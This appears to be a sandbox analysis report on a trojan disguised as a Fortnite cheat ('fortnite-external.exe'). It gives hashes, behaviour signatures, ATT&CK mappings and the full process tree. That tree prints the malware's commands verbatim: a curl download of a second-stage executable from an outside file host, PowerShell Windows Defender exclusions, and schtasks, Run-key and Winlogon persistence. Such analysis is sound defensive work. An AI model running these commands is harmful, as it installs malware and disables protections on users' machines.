Analysis
-
max time kernel
20s -
max time network
12s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21-09-2024 01:08
Static task
static1
Behavioral task
behavioral1
Sample
fortnite-external.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
fortnite-external.exe
Resource
win10v2004-20240802-en
General
-
Target
fortnite-external.exe
-
Size
392KB
-
MD5
450270d6a68cf6364e98f16b917a84e6
-
SHA1
3e89467c9cbc12a76ab77c50913ee45420e16ccc
-
SHA256
30a300329684903e2ca4a937aacbfb337ab30474aadd40e473ca544e8069c52d
-
SHA512
27c7b9c03a026ba578d6c71f6805d07a702740ce21f2e738cadb7fd2d455d6b1abf620c5b147ee018494a33376ff4e907bdf8ce0fa76f7970abe6cd03da6b4b6
-
SSDEEP
6144:whcdTWDsDiY4ElESAtEnESbkaXOahqJiSxRODbGWrZjkmn35GYrZ8RA:fdxE7xr4kmnJ
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\AppData\\Local\\fortnite-external.exe\"" msedge.exe -
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3508 3104 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4800 3104 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4832 3104 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 936 3104 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1008 3104 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2288 3104 schtasks.exe 90 -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3536 powershell.exe 464 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation fortnite-external.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation physmeme.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
pid Process 5012 physmeme.exe 4972 msedge.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fortnite-external = "\"C:\\Users\\Admin\\AppData\\Local\\fortnite-external.exe\"" msedge.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC3835A5923E764F73A740FE53FEB14B23.TMP csc.exe File created \??\c:\Windows\System32\eemqzy.exe csc.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Speech\physmeme.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language physmeme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings physmeme.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3508 schtasks.exe 4800 schtasks.exe 4832 schtasks.exe 936 schtasks.exe 1008 schtasks.exe 2288 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 49 IoCs
pid Process 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe 4972 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4972 msedge.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 5060 wrote to memory of 448 5060 fortnite-external.exe 85 PID 5060 wrote to memory of 448 5060 fortnite-external.exe 85 PID 448 wrote to memory of 4252 448 cmd.exe 86 PID 448 wrote to memory of 4252 448 cmd.exe 86 PID 5060 wrote to memory of 5012 5060 fortnite-external.exe 91 PID 5060 wrote to memory of 5012 5060 fortnite-external.exe 91 PID 5060 wrote to memory of 5012 5060 fortnite-external.exe 91 PID 5012 wrote to memory of 628 5012 physmeme.exe 92 PID 5012 wrote to memory of 628 5012 physmeme.exe 92 PID 5012 wrote to memory of 628 5012 physmeme.exe 92 PID 628 wrote to memory of 4692 628 WScript.exe 96 PID 628 wrote to memory of 4692 628 WScript.exe 96 PID 628 wrote to memory of 4692 628 WScript.exe 96 PID 4692 wrote to memory of 4972 4692 cmd.exe 98 PID 4692 wrote to memory of 4972 4692 cmd.exe 98 PID 4972 wrote to memory of 1256 4972 msedge.exe 102 PID 4972 wrote to memory of 1256 4972 msedge.exe 102 PID 1256 wrote to memory of 4820 1256 csc.exe 104 PID 1256 wrote to memory of 4820 1256 csc.exe 104 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fortnite-external.exe"C:\Users\Admin\AppData\Local\Temp\fortnite-external.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/grb4ph.bin --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/grb4ph.bin --output C:\Windows\Speech\physmeme.exe3⤵
- Drops file in Windows directory
PID:4252
-
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Edge\JVechqugVQULxoCxdNxRwhT9H4AJgXiAXoRwxtptuwyob.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Edge\fu4i1MBsp.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Edge\msedge.exe"C:\Edge/msedge.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\joalwbv0\joalwbv0.cmdline"6⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14EA.tmp" "c:\Windows\System32\CSC3835A5923E764F73A740FE53FEB14B23.TMP"7⤵PID:4820
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\fortnite-external.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:3536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cj9MjoEi0N.bat"6⤵PID:4888
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fortnite-externalf" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\fortnite-external.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3508
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fortnite-external" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\fortnite-external.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fortnite-externalf" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\fortnite-external.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 9 /tr "'C:\Edge\msedge.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2288
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
192B
MD5e5437373d0605c93bc97b65a4a12d739
SHA1671858874a65fd9c7d3de894ba4c590b537f0bde
SHA2569440e1281d71c9d954fb0510d3eb29a1270d10eca8394744c5bd91e2e6f83307
SHA5125345d25ba8cbd179fddbc1255e26e5d3f5e2161e99e4be3bfba1ece5ae317c22df8e115415e300ca5763bd993fb45aa0f5cfca0278c8a6eabb29d48548cf0d2f
-
Filesize
63B
MD5f797a77c821b724238a50a77f0fe1aae
SHA1ee9ff366bdfcba73d9ca0753670f2660baaec9f2
SHA25600c0f57e5f833e74c22e63732816c59eb1f9b8cff197eea7373c32aac58d08d7
SHA51204459b565bd18d707af3740f3f76050dc8d1f5cb4d335460fcc9c3658695558b9bf67e82beb25996c86ee7ba4a2705eaa4da55facc44fa1e854552cd49d8aa23
-
Filesize
1.8MB
MD59257cb2730e4744e1fd4565dec8eb3c8
SHA1a9147f6de05447b78bd78b71517a650028498836
SHA2562964966063f51dd2c3d381468a9d9091d8581442b9d63564af056274cb797061
SHA5120b2228b607a3aa0302515312ab5f9cf86b78c44b94bba7a53507afba00d55208d1387585cd8c0714a9c66831bf99036d91fb81398d6806fd2e086d6019e67e6c
-
Filesize
1KB
MD518563bba5418c09591d115618a331fa6
SHA1c75857bec13834ce9a2e4a7fba900570c53c0800
SHA256e2bb96027efab7ce2b53469a5e30aa30abeda5b1f3a6034ca32a7dbfb97fe37a
SHA51208f95a4fa79440f780c696fb0ae4369c218229b7ec48d5ac8d8b3a8cea6eaf5cb62429c4e8efb23a58592d0ce627bb6723f562754f6c57dbb97a6199ff62c8ac
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.1MB
MD5e5f3f9c01d860a57b5dbc30b44ab4ba0
SHA14a7a9c4aba1968491fcabea3abeaa5ecf3fcb71d
SHA256bd86ed3a268c8e85089ad0602b8894a6463b61569d64b92b63a4c5ab5fed5c0b
SHA512e771a3370cc9706be105ccf8e732e4502845bdbd2b26d9b47ec5766497f419157e01baccd36c8e418fb25de284effcef2da6683f62ca561786c7353140e0a55f
-
Filesize
382B
MD5c8d90847100e57bb85b3d93346e92483
SHA120f9fcc90c4f2cdf33609e39b629033b2b697adb
SHA2568a4b771e0f414291e7aa8d37db335ef83df01d47ad145c70b85ea38d187b5f58
SHA512daf3526ee04421eb37a6ebd2e81683c6d466221fe638a10ebe9b955c3f676a36fb5f6789be4fbf95380080aebaabe602f16a637a59492474a763788e78c99e68
-
Filesize
235B
MD50adfac9f20038e7b7da97f6f1459cf79
SHA1bcfb5414606c1f4b4bd0b04170fb17c69ade780c
SHA25624292975991ea9ae0273eacfb757c8c3a080d331a9fe5b083fe786cbe3bd5a4c
SHA512f5f9a6811ffdbce775cb09f556a0f2f54ec2951772c33f0925508db13d54df404b7437cfcbd271aa5232864776b97e3a58e7a2ba9544dfcf6844084d0f602bb7
-
Filesize
1KB
MD5aaedb470feff0ca43ba622b01d0e7b4f
SHA1e88615dbe9a5c74b28a0cb38666ddb91bd014dd4
SHA256deb4e21657569076441e2f2ed83756a093bb6588a75d8febbabedd64d96d183f
SHA512cf825cfd11de31c4faa0516b0d3b6bc54290f5c5d1098950a6f82fbdc02b8235c2dcae53df823c00def7d47bdada06970cceee01cb5db183ff83879d98977910